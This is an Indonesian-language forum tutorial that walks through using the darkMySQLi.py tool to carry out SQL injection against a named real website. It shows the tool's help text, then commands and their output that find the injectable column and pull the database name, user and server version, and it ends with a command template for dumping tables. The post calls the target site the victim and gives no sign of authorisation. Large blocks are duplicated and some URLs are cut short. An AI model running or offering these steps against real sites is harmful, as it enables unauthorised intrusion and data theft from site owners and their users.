langsung saja ya broow
Directory kalian sob !
Code:
/pentest/web/darkmysqliNext :
Code:
root@riftrick{/pentest/web/darkmysqli}:ls
./ ../ darkMySQLi.log DarkMySQLi.py
root@riftrick{/pentest/web/darkmysqli}:kebetulan dapet situs yang vurln bakal saya jadi in contoh disini :
Code:
http://www.nationalzoo.si.edu/news.php?id=720'
Spoiler! :
root@riftrick{/pentest/web/darkmysqli}:python DarkMySQLi.py --help
darkMySQLi v1.6 ensue1@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information
Target:
-u URL, --url=URL Target url
Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file
darkMySQLi v1.6 ensue1@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information
Target:
-u URL, --url=URL Target url
Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file
Cari dolo sob colom dari database situs target
syntax
Quote:python DarkMySQLi.py -u situstarget.com/bugs.php?id=[sql error] --findcol
Spoiler! :
root@riftrick{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.nationalzoo.si.edu/news.php?id=720 --findcol
|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.nationalzoo.si.edu/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,
[!] SQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...darkc0de--
[-] 18:07:20
[-] Total URL Requests: 2
[-] Done
Don't forget to check darkMySQLi.log
|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.nationalzoo.si.edu/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,
[!] SQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...darkc0de--
[-] 18:07:20
[-] Total URL Requests: 2
[-] Done
Don't forget to check darkMySQLi.log
situs tsb harus vurln jika benar maka Langkah berikutnya seperti akhir pesan pada tools tersebut "Don't forget to check darkMySQLI.log" sekarang kita periksa log tersebut yang berada dalam satu directory tools nya !!!
Spoiler! :
root@riftrick{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.nationalzoo.si.edu/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,
[!] SQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de--
[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done
saya tandain warna merah sob,, untuk langkah ketiga masukan sintax
Tujuan kita sebenarnya adalah menampilkan semua kolom yang ada pada database situs korban
Quote:python DarkMySQLi.py -u [url dari log dark log]-- --full
Spoiler! :
root@riftrick{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...darkc0de-- --full
|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: admzoo213_azodb
User: admzoo213_azouser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...IMIT+0,1--
[-] 18:54:41
[-] Total URL Requests: 3
[-] Done
Don't forget to check darkMySQLi.log
Next step adalah liat lagi di log tadi
Spoiler! :
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: admzoo213_azodb
User: admzoo213_azouser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790
[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: admzoo213_azodb
User: admzoo213_azouser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790
[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done
Perhatikan lagi yang saya warnai merah
kita sudah mendapatkan nama database, user dan versi nya !!!
Langkah selanjutnya tinggal dump databasenya aja sob ... wkkwkwkw
mau pake manual kan udah ada tuh ..
syntax
Code:
darkMySQLi.py -u "(target yg ada bug)" --dump -D (nama databasenya) -T (nama table) -C (column,column)Terima kasih sudah membaca article ini !!!
